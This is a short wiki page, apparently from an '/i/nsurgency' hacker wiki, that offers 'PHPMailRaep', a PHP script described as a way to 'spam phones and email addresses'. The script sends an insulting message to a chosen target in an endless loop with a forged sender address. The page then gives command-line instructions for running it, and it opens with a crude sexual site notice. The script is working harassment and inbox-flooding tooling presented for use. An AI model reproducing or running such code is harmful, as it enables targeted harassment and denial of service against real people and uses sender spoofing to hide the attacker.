Site Notice: Trading sexual favors for grunt work. This applies to:
Broken Links <Fix or fill in
Dead ends including some of our oldest pages
Unlinked Pages - Just fix what's up to date
and also p much anything u find under 'Maintenance reports' here
PHPMailRaep
From /i/nsurgency W/i/ki
PHPMailRaep is a simple script to spam phones and email addresses.
[edit] Code
<?php
// Simple PHPMailRaep by janus zeal
// irc.netchan.org #insurgency
$to = "email address";
$subject = "asshole of the year";
$message = "haha";
$from = "pedrobear@internet.br";
// From address doesn't have to be valid, but it should look like a real email
// Don't edit below here
$count = 0;
$headers = "From: $from";
while (1) {
$count++;
mail($to,$subject,$message,$headers);
print "Message sent, Now @ " . $count . "\n";
}
?>
[edit] Use
Run from the nix command line, sendmail and php-cgi are required.
php-cgi mail.php
Ctrl-c to exit (Not pretty, I know. :\)